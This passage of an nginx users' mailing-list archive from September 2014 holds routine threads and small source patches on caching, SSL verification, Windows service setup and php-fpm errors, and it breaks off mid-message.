On Wed, Sep 10, 2014 at 10:30:55AM -0400, biazus wrote: > Hey Guys, > > We have been using the latest stable Nginx version 1.6.1, and I've > noticed that we might be facing a bug that was supposed to be fixed in > version 1.5.11. > > Bugfix: the $upstream_status variable might contain wrong data if the > "proxy_cache_use_stale" or "proxy_cache_revalidate" directives were used. > > On MISS requests the variables "$upstream_status" and > "$upstream_response_time" are eventually returning wrong data, like the > example below: > > $upstream_status - "504, 504, 200" or even "-, 200" > > $upstream_response_time - "8.005, 0.242" > > As you can see, the data contain two or three values separated by a comma, > and also the $upstream_response_time contains two time values, both separated > by a comma. > > Does that make sense to you guys? Is it expected? Yes, see http://nginx.org/r/$upstream_addr. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Wed Sep 10 17:49:00 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Wed, 10 Sep 2014 21:49:00 +0400 Subject: Change blank uwsgi_cache_key default, or log warning In-Reply-To: References: Message-ID: <20140910174859.GU59236@mdounin.ru> Hello! On Tue, Sep 09, 2014 at 02:25:15PM -0400, gthb wrote: > Hello, > > Because uwsgi_cache_key has no default value (or rather, has the empty > string as its default value), a configuration with uwsgi_cache set but > uwsgi_cache_key not set behaves in a way that is very unlikely to be > desired: Nginx caches the first publicly cacheable response it gets from > upstream (for any request), and serves that cached response to *any* request > mapping to the same location.
The internals of that can be seen in the debug > log, where the cache key is empty for all requests: > > 2014/09/09 17:41:02 [debug] 91211#0: *13 http cache key: "" > > This is in contrast to a configuration with proxy_cache enabled but > proxy_cache_key not set; that behaves OK because proxy_cache_key has a > useful default. > > Because of the *general* correspondence between the http_proxy and > http_uwsgi modules, it's easy to fall into this trap, defining uwsgi_cache > but not uwsgi_cache_key. When that happens, and unexpected responses start > coming back, the first place one looks is error.log, and there's nothing > there. > > To get rid of this gotcha, I suggest either: > > 1. log a warning whenever a location/server/http block has uwsgi_cache set > but no uwsgi_cache_key set. Yes, this is mostly trivial and certainly makes sense. Patch below. # HG changeset patch # User Maxim Dounin # Date 1410371072 -14400 # Wed Sep 10 21:44:32 2014 +0400 # Node ID bc4ee0b7cf2643fdcea310638302b9cadc7ac939 # Parent aaa82dc56c9460db1b4233fc1d4559fdd07ff7ed Added warning about unset cache keys. In fastcgi, scgi and uwsgi modules there are no default cache keys, and using a cache without a cache key set is likely meaningless. 
diff --git a/src/http/modules/ngx_http_fastcgi_module.c b/src/http/modules/ngx_http_fastcgi_module.c --- a/src/http/modules/ngx_http_fastcgi_module.c +++ b/src/http/modules/ngx_http_fastcgi_module.c @@ -2582,6 +2582,11 @@ ngx_http_fastcgi_merge_loc_conf(ngx_conf conf->cache_key = prev->cache_key; } + if (conf->upstream.cache && conf->cache_key.value.data == NULL) { + ngx_conf_log_error(NGX_LOG_WARN, cf, 0, + "no \"fastcgi_cache_key\" for \"fastcgi_cache\""); + } + ngx_conf_merge_value(conf->upstream.cache_lock, prev->upstream.cache_lock, 0); diff --git a/src/http/modules/ngx_http_scgi_module.c b/src/http/modules/ngx_http_scgi_module.c --- a/src/http/modules/ngx_http_scgi_module.c +++ b/src/http/modules/ngx_http_scgi_module.c @@ -1337,6 +1337,11 @@ ngx_http_scgi_merge_loc_conf(ngx_conf_t conf->cache_key = prev->cache_key; } + if (conf->upstream.cache && conf->cache_key.value.data == NULL) { + ngx_conf_log_error(NGX_LOG_WARN, cf, 0, + "no \"scgi_cache_key\" for \"scgi_cache\""); + } + ngx_conf_merge_value(conf->upstream.cache_lock, prev->upstream.cache_lock, 0); diff --git a/src/http/modules/ngx_http_uwsgi_module.c b/src/http/modules/ngx_http_uwsgi_module.c --- a/src/http/modules/ngx_http_uwsgi_module.c +++ b/src/http/modules/ngx_http_uwsgi_module.c @@ -1524,6 +1524,11 @@ ngx_http_uwsgi_merge_loc_conf(ngx_conf_t conf->cache_key = prev->cache_key; } + if (conf->upstream.cache && conf->cache_key.value.data == NULL) { + ngx_conf_log_error(NGX_LOG_WARN, cf, 0, + "no \"uwsgi_cache_key\" for \"uwsgi_cache\""); + } + ngx_conf_merge_value(conf->upstream.cache_lock, prev->upstream.cache_lock, 0); -- Maxim Dounin http://nginx.org/ From reallfqq-nginx at yahoo.fr Wed Sep 10 18:26:10 2014 From: reallfqq-nginx at yahoo.fr (B.R.) 
Date: Wed, 10 Sep 2014 20:26:10 +0200 Subject: Windows 2008 - logging off kills nginx In-Reply-To: <72bf9bbe8299a063ecd9c8e48e7981cf.NginxMailingListEnglish@forum.nginx.org> References: <72bf9bbe8299a063ecd9c8e48e7981cf.NginxMailingListEnglish@forum.nginx.org> Message-ID: You start a process in userland then kill that userland. No surprises there... Consider running nginx as a service/unconnected to your user session. --- *B. R.* On Wed, Sep 10, 2014 at 6:16 PM, ronlemonz wrote: > I log into the box as myself and then run a bat file which includes: > c:\nginx\RunHiddenConsole.exe C:\nginx\nginx.exe > ECHO Start php-cgi... > c:\nginx\RunHiddenConsole.exe C:\nginx\php-cgi-start.bat > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,253161,253164#msg-253164 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Wed Sep 10 19:27:10 2014 From: nginx-forum at nginx.us (nanochelandro) Date: Wed, 10 Sep 2014 15:27:10 -0400 Subject: =?UTF-8?Q?Re=3A_fastcgi_cache_use_stale_=22updating=22_=E2=80=94_improveme?= =?UTF-8?Q?nt_suggestion?= In-Reply-To: <20140910170130.GR59236@mdounin.ru> References: <20140910170130.GR59236@mdounin.ru> Message-ID: <82300b971a0ea78ecdf89830eb4eeeee.NginxMailingListEnglish@forum.nginx.org> Maxim Dounin Wrote: > nginx needs a client request to be able to request a > resource from a backend and to save it to the cache. I'm afraid my explanation wasn't clear enough. There's no need to make nginx able to make requests to fastcgi on its own initiative. How it works today: A client makes a request. Nginx sees the cache has expired and issues a request to fastcgi. It takes some time and the client is patiently *waiting*. Finally, after nginx gets a response from the fastcgi app, it stores it in the cache and sends it to the client.
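[The "how it works today" flow above corresponds to a configuration along these lines. This is an editorial sketch; the backend socket, zone name and cache times are made up for illustration:]

```nginx
# With "updating", only requests that arrive while another request is
# already refreshing an expired entry are served the stale copy; the
# request that triggers the refresh itself waits for FastCGI.
fastcgi_cache_path /var/cache/nginx levels=1:2 keys_zone=app:10m inactive=60m;

server {
    listen 80;

    location ~ \.php$ {
        include       fastcgi_params;
        fastcgi_pass  unix:/run/php-fpm.sock;   # hypothetical backend

        fastcgi_cache       app;
        fastcgi_cache_key   $scheme$host$request_uri;
        fastcgi_cache_valid 200 10m;
        fastcgi_cache_use_stale updating error timeout;
    }
}
```

[For the record, the behaviour requested in this thread, serving the stale copy to the first request as well and refreshing in the background, was later implemented in nginx 1.11.10 as `fastcgi_cache_background_update on;`.]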
How it can be improved: A client makes a request. Nginx sees the cache has expired and issues a request to fastcgi. But nginx doesn't wait for the fastcgi response, and *immediately* responds to the client with *stale* cache contents (if they exist). The client is like "whoa, that was fast!". And later, eventually, nginx gets a response from the fastcgi app and updates the cache. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253165,253171#msg-253171 From michal at 3scale.net Wed Sep 10 22:56:29 2014 From: michal at 3scale.net (Michal Cichra) Date: Thu, 11 Sep 2014 00:56:29 +0200 Subject: Using default CA path from openssl Message-ID: Hi, first I would like to say thanks for the proxy ssl verification that landed in nginx 1.7. Regarding that, there is one slight problem I've found when creating a proxy that dynamically accesses different hosts. The configuration is limited to setting a certificate and does not use a CA path at all. OpenSSL has a compiled-in default CA path, and on some distributions it points to the system trusted CA store. What I propose is a configuration flag to set `SSL_CTX_set_default_verify_paths`. My not polished patch is: --- bundle/nginx-1.7.4/src/event/ngx_event_openssl.c.orig 2014-09-10 23:33:09.000000000 +0200 +++ bundle/nginx-1.7.4/src/event/ngx_event_openssl.c 2014-09-10 23:33:49.000000000 +0200 @@ -498,6 +498,7 @@ SSL_CTX_set_verify_depth(ssl->ctx, depth); if (cert->len == 0) { + SSL_CTX_set_default_verify_paths(ssl->ctx); return NGX_OK; } When there is no certificate, load defaults. That certainly has some drawbacks. So I would propose something like `proxy_ssl_trusted_certificate system;`. What do you think? It could increase the memory load, but it is really convenient for general ssl verification. Another proposed solution ( https://groups.google.com/forum/#!topic/openresty-en/SuqORBK9ys0 ) was to export system certificates, and load them from one file.
That does not work for me, as I need to make a reusable nginx configuration that can be deployed on many platforms, and it would be hard to instruct people how to do it. Best, Michal Cichra From e1c1bac6253dc54a1e89ddc046585792 at posteo.net Thu Sep 11 03:14:58 2014 From: e1c1bac6253dc54a1e89ddc046585792 at posteo.net (Philipp) Date: Thu, 11 Sep 2014 05:14:58 +0200 Subject: Using default CA path from openssl In-Reply-To: References: Message-ID: <55ec85dedb7a4c5e5f46d10ee14a40d3@posteo.de> On 11.09.2014 00:56, Michal Cichra wrote: > What I propose is a configuration flag, to set > `SSL_CTX_set_default_verify_paths`. Careful what you wish for.. I didn't check the surrounding code, but the above call and CAfile/CApath sets (whether via cmd-line or via API won't matter) have "funny" error conditions; see this post and the thread: http://marc.info/?l=openbsd-tech&m=140646297120492&w=2 Just a 2ct heads up. From mylich119 at 126.com Thu Sep 11 07:09:00 2014 From: mylich119 at 126.com (mylich119) Date: Thu, 11 Sep 2014 15:09:00 +0800 Subject: help for tcpinfo Message-ID: <62be3acd.3cb9.148638b383f.Coremail.mylich119@126.com> hi everyone, now I am trying to use $tcpinfo_rtt in the nginx.conf, but it can not be recognized. below is my environment. and when I built nginx 1.6.1, it said "checking for TCP_INFO ... not found " [lichuanhui at yptest01v ~/nginx-1.6.1]$ cat /etc/redhat-release CentOS release 5.4 (Final) [lichuanhui at yptest01v ~/nginx-1.6.1]$ uname -a Linux yptest01v.add.corp.qihoo.net 2.6.18-164.el5xen #1 SMP Thu Sep 3 04:03:03 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux 2014-09-11 mylich119 -------------- next part -------------- An HTML attachment was scrubbed... URL: From artemrts at ukr.net Thu Sep 11 09:01:00 2014 From: artemrts at ukr.net (wishmaster) Date: Thu, 11 Sep 2014 12:01:00 +0300 Subject: fastcgi_cache_bypass. Need some explain. Message-ID: <1410425474.167438742.fcrqx0l7@frv34.fwdcdn.com> Hi, I am attempting to configure nginx to avoid caching some data.
map $http_x_requested_with $no_cache { default 0; "XMLHttpRequest" 1; } fastcgi_cache_bypass $no_cache; fastcgi_no_cache $no_cache; With the above configuration the exceptions work fine, but with the one below they do not. Why? fastcgi_cache_bypass $http_x_requested_with; fastcgi_no_cache $http_x_requested_with; With the above config all requests (not only those with "X-Requested-With: XMLHttpRequest") are bypassed. -- Cheers, Vit From vbart at nginx.com Thu Sep 11 10:55:21 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Thu, 11 Sep 2014 14:55:21 +0400 Subject: help for tcpinfo In-Reply-To: <62be3acd.3cb9.148638b383f.Coremail.mylich119@126.com> References: <62be3acd.3cb9.148638b383f.Coremail.mylich119@126.com> Message-ID: <2715310.p2f0aje3RQ@vbart-workstation> On Thursday 11 September 2014 15:09:00 mylich119 wrote: > hi everyone, > now I am trying to use $tcpinfo_rtt in the nginx.conf, but it can not be > recognized. > > below is my environment. and when I built nginx 1.6.1, it said "checking for > TCP_INFO ... not found " > > [lichuanhui at yptest01v ~/nginx-1.6.1]$ cat /etc/redhat-release > CentOS release 5.4 (Final) > [lichuanhui at yptest01v ~/nginx-1.6.1]$ uname -a > Linux yptest01v.add.corp.qihoo.net 2.6.18-164.el5xen #1 SMP Thu Sep 3 > 04:03:03 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux > > That's what usually happens when you're using an ancient OS. If I'm not mistaken, you need glibc 2.7 or later. wbr, Valentin V. Bartenev From nginx-forum at nginx.us Thu Sep 11 13:27:52 2014 From: nginx-forum at nginx.us (ronlemonz) Date: Thu, 11 Sep 2014 09:27:52 -0400 Subject: Windows 2008 - logging off kills nginx In-Reply-To: References: Message-ID: Thank you. Seems awkward to set it as a service... in Windows. I see 3rd party solutions to automate nginx as a service... but that seems strange.
Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253161,253181#msg-253181 From mdounin at mdounin.ru Thu Sep 11 13:42:49 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 11 Sep 2014 17:42:49 +0400 Subject: =?UTF-8?Q?Re=3A_fastcgi_cache_use_stale_=22updating=22_=E2=80=94_improveme?= =?UTF-8?Q?nt_suggestion?= In-Reply-To: <82300b971a0ea78ecdf89830eb4eeeee.NginxMailingListEnglish@forum.nginx.org> References: <20140910170130.GR59236@mdounin.ru> <82300b971a0ea78ecdf89830eb4eeeee.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140911134249.GX59236@mdounin.ru> Hello! On Wed, Sep 10, 2014 at 03:27:10PM -0400, nanochelandro wrote: > Maxim Dounin Wrote: > > nginx needs a client request to be able to request a > > resource from a backend and to save it to the cache. > > I'm afraid my explanation wasn't clear enough. > There's no need to make nginx able to make requests to fastcgi on it's own > initiative. > > How it works today: > A client makes a request. Nginx sees the cache has expired and issues a > request to fastcgi. It takes some time and client is patiently *waiting*. > Finally, after nginx gets a response from fastcgi app, it stores it in cache > and sends it to the client. > > How it can be improved: > A client makes a request. Nginx sees the cache has expired and issues a > request to fastcgi. But nginx doesn't wait for fastcgi response, and > *immediately* responds to the client with *stale* cache contents (if it > exists). Client is like "whoa, that was fast!". And later, eventually, nginx > gets a response from fastcgi app and updates cache. Uhm, it looks like I wasn't clear enough. What you suggest is perfectly understood, thanks (and I believe there is even an enhancement ticket in trac about this). The problem is that nginx needs a request object (and a connection object) to get/cache a response, and returning a stale cached response means the request object will be used to send the cached response. 
-- Maxim Dounin http://nginx.org/ From miguelmclara at gmail.com Thu Sep 11 13:45:33 2014 From: miguelmclara at gmail.com (Miguel Clara) Date: Thu, 11 Sep 2014 14:45:33 +0100 Subject: Windows 2008 - logging off kills nginx In-Reply-To: References: Message-ID: <84d1c351-4203-4cb2-b364-3ecd3d08c33e@email.android.com> On September 11, 2014 2:27:52 PM GMT+01:00, ronlemonz wrote: >Thank you. Seems awkward to set it as a service... in Windows. Why? Doesn't Windows run other services? Ex: IIS. Actually, I'd prefer it if Windows ran fewer services by default; I always have to do some cleaning, but it's worse in desktop than in server versions, of course. > I see >3rd >party solutions to automate nginx as a service... but that seems >strange. > You can also simply schedule a task that runs a batch file. I'm not running any Windows servers with nginx at the moment, but I tested a while ago with https://github.com/mike-pt/NginxService (please follow the link to the original repo by sneal); see if that works for you. >Posted at Nginx Forum: >http://forum.nginx.org/read.php?2,253161,253181#msg-253181 > >_______________________________________________ >nginx mailing list >nginx at nginx.org >http://mailman.nginx.org/mailman/listinfo/nginx -- Sent from my Android device with K-9 Mail. Please excuse my brevity. From nginx-forum at nginx.us Thu Sep 11 14:12:58 2014 From: nginx-forum at nginx.us (ronlemonz) Date: Thu, 11 Sep 2014 10:12:58 -0400 Subject: Windows 2008 - logging off kills nginx In-Reply-To: <84d1c351-4203-4cb2-b364-3ecd3d08c33e@email.android.com> References: <84d1c351-4203-4cb2-b364-3ecd3d08c33e@email.android.com> Message-ID: Sorry, I think I might have it now. Trying to re-create a dev server based on a prod server. I went through setting by setting comparing both servers... waiting to see if it runs during the night. I think the run as "SYSTEM" is the answer. So I can log off and it should work (I hope).
Thanks for the help, Ron Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253161,253184#msg-253184 From nginx-forum at nginx.us Thu Sep 11 14:15:43 2014 From: nginx-forum at nginx.us (arraisgabriel) Date: Thu, 11 Sep 2014 10:15:43 -0400 Subject: "No space left on device" for temp cache - v1.7.4 Message-ID: <506ae84bd2cfd6713a098f184c32a619.NginxMailingListEnglish@forum.nginx.org> Hi, recently we noticed that version 1.7.3 added a feature important to our infrastructure: "cache revalidation now uses If-None-Match header if possible.". So we changed part of our cache to the 1.7.4 version, but something strange started to happen: at a certain point of disk usage nginx started to return 500 to all requests, with this kind of message in the error log: [crit] 12908#0: *7209656 open() "/cache/nginx_tmp/0002938835" failed (28: No space left on device) while reading upstream, client: xxx.xxx.xxx.xxx, server: , request: "GET http://xxxxxxxx.net/ HTTP/1.1", upstream: "http://xxx.xx.xxx.xxx:80/", host: "xxxxxxxx.net" It looked like there wasn't enough space in the temporary cache directory. But running df -h (and after sync && df -h) the result was: [user at nginx ~]$ df -h Filesystem Size Used Avail Use% Mounted on /dev/xvda1 7.8G 2.3G 5.4G 30% / devtmpfs 3.7G 20K 3.7G 1% /dev tmpfs 3.7G 0 3.7G 0% /dev/shm /dev/xvdb 40G 12G 27G 31% 24% /cache ---------------------------------------- used for cache I think it is important to know that a very similar configuration is running well on a 1.7.2 server with the same specs and without the cache revalidation directives. This is my cache path configuration: proxy_cache_path /cache/nginx levels=1:2 keys_zone=cache:1500m max_size=27G inactive=1200m; Can you help? Gabriel Arrais.
Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253185,253185#msg-253185 From michal at 3scale.net Thu Sep 11 14:17:27 2014 From: michal at 3scale.net (Michal Cichra) Date: Thu, 11 Sep 2014 16:17:27 +0200 Subject: Using default CA path from openssl In-Reply-To: <55ec85dedb7a4c5e5f46d10ee14a40d3@posteo.de> References: <55ec85dedb7a4c5e5f46d10ee14a40d3@posteo.de> Message-ID: <6CAE16A1-4638-454A-A13B-F7623C44F445@3scale.net> Yes, the s_client and s_server core is ? There are even bugs filed https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/396818 But this is different. The SSL_CTX_set_default_verify_paths does not have a bug, but the usage of it is wrong. Cheers. On 11 Sep 2014, at 05:14, Philipp wrote: > On 11.09.2014 00:56, Michal Cichra wrote: >> What I propose is a configuration flag, to set >> `SSL_CTX_set_default_verify_paths`. > > Careful what you wish for.. > > I didn't check the surrounding code, but the above call and CAfile/CApath sets (whether via cmd-line or via API won't matter) > have "funny" error conditions; see this post and the thread: > http://marc.info/?l=openbsd-tech&m=140646297120492&w=2 > > Just a 2ct heads up. > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Thu Sep 11 14:29:53 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 11 Sep 2014 18:29:53 +0400 Subject: fastcgi_cache_bypass. Need some explain. In-Reply-To: <1410425474.167438742.fcrqx0l7@frv34.fwdcdn.com> References: <1410425474.167438742.fcrqx0l7@frv34.fwdcdn.com> Message-ID: <20140911142952.GY59236@mdounin.ru> Hello! On Thu, Sep 11, 2014 at 12:01:00PM +0300, wishmaster wrote: > Hi, > > I am attempting to configure nginx to avoid caching some data.
> map $http_x_requested_with $no_cache { > default 0; > "XMLHttpRequest" 1; > } > > fastcgi_cache_bypass $no_cache; > fastcgi_no_cache $no_cache; > > With the above configuration the exceptions work fine, but with the one below they do not. Why? > > fastcgi_cache_bypass $http_x_requested_with; > fastcgi_no_cache $http_x_requested_with; > > With the above config all requests (not only those with "X-Requested-With: XMLHttpRequest") are bypassed. Most likely there is some subtle error in the configuration - e.g., a missing ";" after fastcgi_cache_bypass. The fastcgi_cache_bypass gets an arbitrary number of arbitrary parameters, and something like: fastcgi_cache_bypass $http_x_requested_with fastcgi_no_cache $http_x_requested_with; is perfectly valid from a syntax point of view, but really means fastcgi_cache_bypass with the "$http_x_requested_with", "fastcgi_no_cache" and "$http_x_requested_with" parameters. And the "fastcgi_no_cache" parameter is always true, hence all requests bypass the cache. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Thu Sep 11 14:37:50 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 11 Sep 2014 18:37:50 +0400 Subject: "No space left on device" for temp cache - v1.7.4 In-Reply-To: <506ae84bd2cfd6713a098f184c32a619.NginxMailingListEnglish@forum.nginx.org> References: <506ae84bd2cfd6713a098f184c32a619.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140911143750.GZ59236@mdounin.ru> Hello! On Thu, Sep 11, 2014 at 10:15:43AM -0400, arraisgabriel wrote: > Hi, recently we noticed that version 1.7.3 added a feature important to > our infrastructure: "cache revalidation now uses If-None-Match header if > possible.".
> So we changed part of our cache to the 1.7.4 version, but something strange > started to happen: at a certain point of disk usage nginx started to return > 500 to all requests with this kind of message in the error log: > > [crit] 12908#0: *7209656 open() "/cache/nginx_tmp/0002938835" failed (28: No > space left on device) while reading upstream, client: xxx.xxx.xxx.xxx, > server: , request: "GET http://xxxxxxxx.net/ HTTP/1.1", upstream: > "http://xxx.xx.xxx.xxx:80/", host: "xxxxxxxx.net" > > It looked like there wasn't enough space in the temporary cache > directory. But running df -h (and after sync && df -h) the result was: > > [user at nginx ~]$ df -h > Filesystem Size Used Avail Use% Mounted on > /dev/xvda1 7.8G 2.3G 5.4G 30% / > devtmpfs 3.7G 20K 3.7G 1% /dev > tmpfs 3.7G 0 3.7G 0% /dev/shm > /dev/xvdb 40G 12G 27G 31% 24% /cache > ---------------------------------------- used for cache ENOSPC from open() likely means you've run out of inodes, not disk space. Try looking into "df -i", it may be helpful. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Thu Sep 11 15:00:08 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 11 Sep 2014 19:00:08 +0400 Subject: Using default CA path from openssl In-Reply-To: References: Message-ID: <20140911150007.GA59236@mdounin.ru> Hello! On Thu, Sep 11, 2014 at 12:56:29AM +0200, Michal Cichra wrote: > Hi, > > first I would like to say thanks for the proxy ssl verification that > landed in nginx 1.7. > > Regarding that, there is one slight problem I've found when > creating a proxy that dynamically accesses different hosts. > The configuration is limited to setting a certificate and does > not use a CA path at all. > > OpenSSL has a compiled-in default CA path, and on > some distributions it points to the system trusted CA store. > > What I propose is a configuration flag to set > `SSL_CTX_set_default_verify_paths`.
> > My not polished patch is: > --- bundle/nginx-1.7.4/src/event/ngx_event_openssl.c.orig 2014-09-10 23:33:09.000000000 +0200 > +++ bundle/nginx-1.7.4/src/event/ngx_event_openssl.c 2014-09-10 23:33:49.000000000 +0200 > @@ -498,6 +498,7 @@ > SSL_CTX_set_verify_depth(ssl->ctx, depth); > > if (cert->len == 0) { > + SSL_CTX_set_default_verify_paths(ssl->ctx); > return NGX_OK; > } > > When there is no certificate, load defaults. That certainly has > some drawbacks. So I would propose something like > `proxy_ssl_trusted_certificate system;`. > > What do you think? It could increase the memory load, but it is > really convenient for general ssl verification. A special value to load the system default CA certs may make sense. -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Thu Sep 11 15:14:49 2014 From: nginx-forum at nginx.us (arraisgabriel) Date: Thu, 11 Sep 2014 11:14:49 -0400 Subject: "No space left on device" for temp cache - v1.7.4 In-Reply-To: <20140911143750.GZ59236@mdounin.ru> References: <20140911143750.GZ59236@mdounin.ru> Message-ID: <4fc16d1afda3b103337beeef19a26d95.NginxMailingListEnglish@forum.nginx.org> Thank you very much for the quick response. It looks like the cache now stores many small files because of the revalidation feature, and reached the inode storage limit. Maxim Dounin Wrote: ------------------------------------------------------- > Hello! > > On Thu, Sep 11, 2014 at 10:15:43AM -0400, arraisgabriel wrote: > > > Hi, recently we noticed that version 1.7.3 added a feature > important to > > our infrastructure: "cache revalidation now uses If-None-Match > header if > > possible.".
> > So we changed part of our cache to the 1.7.4 version, but something > strange > > started to happen: at a certain point of disk usage nginx started to > return > > 500 to all requests with this kind of message in the error log: > > > > [crit] 12908#0: *7209656 open() "/cache/nginx_tmp/0002938835" failed > (28: No > > space left on device) while reading upstream, client: > xxx.xxx.xxx.xxx, > > server: , request: "GET http://xxxxxxxx.net/ HTTP/1.1", upstream: > > "http://xxx.xx.xxx.xxx:80/", host: "xxxxxxxx.net" > > > > It looked like there wasn't enough space in the temporary cache > > directory. But running df -h (and after sync && df -h) the result > was: > > > > [user at nginx ~]$ df -h > > Filesystem Size Used Avail Use% Mounted on > > /dev/xvda1 7.8G 2.3G 5.4G 30% / > > devtmpfs 3.7G 20K 3.7G 1% /dev > > tmpfs 3.7G 0 3.7G 0% /dev/shm > > /dev/xvdb 40G 12G 27G 31% 24% /cache > > ---------------------------------------- used for cache > > ENOSPC from open() likely means you've run out of inodes, not disk > space. Try looking into "df -i", it may be helpful. > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253185,253192#msg-253192 From r_o_l_a_n_d at hotmail.com Thu Sep 11 15:33:27 2014 From: r_o_l_a_n_d at hotmail.com (Roland RoLaNd) Date: Thu, 11 Sep 2014 18:33:27 +0300 Subject: Query_String not matching Message-ID: Hello, I am obviously a new nginx user, so please bear with me. I have set up nginx as a content caching service, running on port 80 and directing traffic to backend servers. All works okay, except for one specific scenario where I want to cache an object matching a specific query string. Here's a sample: .../getimage.view&id=19823&class=5617&size=80 I want to cache objects matching: class=5617&size=80
since obviously the ID will change depending on the user. I googled "nginx config", etc... Everything I found simply explains that I could match $uri and $args, but not how to bypass args. I tried the following: if ($uri ~* "^getimage.view") { set $args $2$3; set $cache_key $scheme$host$uri$is_args$args; } But it's not working.... Any advice? Or, better yet, any place I can learn more about manipulating query strings? Thanks in advance. From nginx-forum at nginx.us Thu Sep 11 20:42:51 2014 From: nginx-forum at nginx.us (nfn) Date: Thu, 11 Sep 2014 16:42:51 -0400 Subject: 502 errors with nginx and php5-fpm In-Reply-To: <20140908115057.GA59236@mdounin.ru> References: <20140908115057.GA59236@mdounin.ru> Message-ID: <64d14f9fbecddd0a4f793c92e7886986.NginxMailingListEnglish@forum.nginx.org> Hi, Here is the debug log: http://pastebin.com/raw.php?i=w8Bwj4pS Can you help me understand why I have these random 502 errors? Thanks Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253117,253202#msg-253202 From miguelmclara at gmail.com Thu Sep 11 23:53:02 2014 From: miguelmclara at gmail.com (Miguel Clara) Date: Fri, 12 Sep 2014 00:53:02 +0100 Subject: 502 errors with nginx and php5-fpm In-Reply-To: <64d14f9fbecddd0a4f793c92e7886986.NginxMailingListEnglish@forum.nginx.org> References: <20140908115057.GA59236@mdounin.ru> <64d14f9fbecddd0a4f793c92e7886986.NginxMailingListEnglish@forum.nginx.org> Message-ID: What do you see in the php-fpm logs? Maybe the php-fpm processes are not enough to handle the requests. On September 11, 2014 9:42:51 PM GMT+01:00, nfn wrote: >Hi, > >Here is the debug log: http://pastebin.com/raw.php?i=w8Bwj4pS > >Can you help me understand why I have these random 502 errors? > >Thanks > >Posted at Nginx Forum: >http://forum.nginx.org/read.php?2,253117,253202#msg-253202 > >_______________________________________________ >nginx mailing list >nginx at nginx.org >http://mailman.nginx.org/mailman/listinfo/nginx -- Sent from my Android device with K-9 Mail.
Please excuse my brevity. -------------- next part -------------- An HTML attachment was scrubbed... URL: From root at xtremenitro.org Fri Sep 12 01:27:43 2014 From: root at xtremenitro.org (NitrouZ) Date: Fri, 12 Sep 2014 08:27:43 +0700 Subject: "No space left on device" for temp cache - v1.7.4 In-Reply-To: <4fc16d1afda3b103337beeef19a26d95.NginxMailingListEnglish@forum.nginx.org> References: <20140911143750.GZ59236@mdounin.ru> <4fc16d1afda3b103337beeef19a26d95.NginxMailingListEnglish@forum.nginx.org> Message-ID: What file system do you use for the cache? Try using xfs instead of ext4. Xfs has better inode handling than ext4. On Thursday, September 11, 2014, arraisgabriel wrote: > Thank you very much for the quick response. It looks like the cache > now stores many small files because of the revalidation feature, and > reached > the inode storage limit. > > > Maxim Dounin Wrote: > ------------------------------------------------------- > > Hello! > > > > On Thu, Sep 11, 2014 at 10:15:43AM -0400, arraisgabriel wrote: > > > > > Hi, recently we noticed that version 1.7.3 added a feature > > important to > > > our infrastructure: "cache revalidation now uses If-None-Match > > header if > > > possible.". > > > So we changed part of our cache to the 1.7.4 version, but something > > strange > > > started to happen: at a certain point of disk usage nginx started to > > return > > > 500 to all requests with this kind of message in the error log: > > > > > > [crit] 12908#0: *7209656 open() "/cache/nginx_tmp/0002938835" failed > > (28: No > > > space left on device) while reading upstream, client: > > xxx.xxx.xxx.xxx, > > > server: , request: "GET http://xxxxxxxx.net/ HTTP/1.1", upstream: > > > "http://xxx.xx.xxx.xxx:80/", host: "xxxxxxxx.net" > > > > > > It looked like there wasn't enough space in the temporary cache > > > directory.
But running df -h (and after sync && df -h) the result > > was:

> > > [user at nginx ~]$ df -h
> > > Filesystem  Size  Used  Avail  Use%  Mounted on
> > > /dev/xvda1  7.8G  2.3G  5.4G   30%   /
> > > devtmpfs    3.7G  20K   3.7G   1%    /dev
> > > tmpfs       3.7G  0     3.7G   0%    /dev/shm
> > > /dev/xvdb   40G   12G   27G    31%   /cache   <---- used for cache

> > ENOSPC from open() likely means you've run out of inodes, not disk > > space. Try looking into "df -i", it may be helpful. > > > > -- > > Maxim Dounin > > http://nginx.org/ > > > > _______________________________________________ > > nginx mailing list > > nginx at nginx.org > > http://mailman.nginx.org/mailman/listinfo/nginx > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,253185,253192#msg-253192 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -- Sent from iDewangga Device -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Fri Sep 12 08:37:24 2014 From: nginx-forum at nginx.us (antoniofernandez) Date: Fri, 12 Sep 2014 04:37:24 -0400 Subject: Extrange behaviour with index.php and a plain link ( windows vs linux ? ) Message-ID: Hi all, This is my first comment here, thanks in advance to all who contribute. I'm starting with nginx + php + fastCGI in a windows environment, and I'm having the following behaviour: I have two index.php files:

/public/index.php
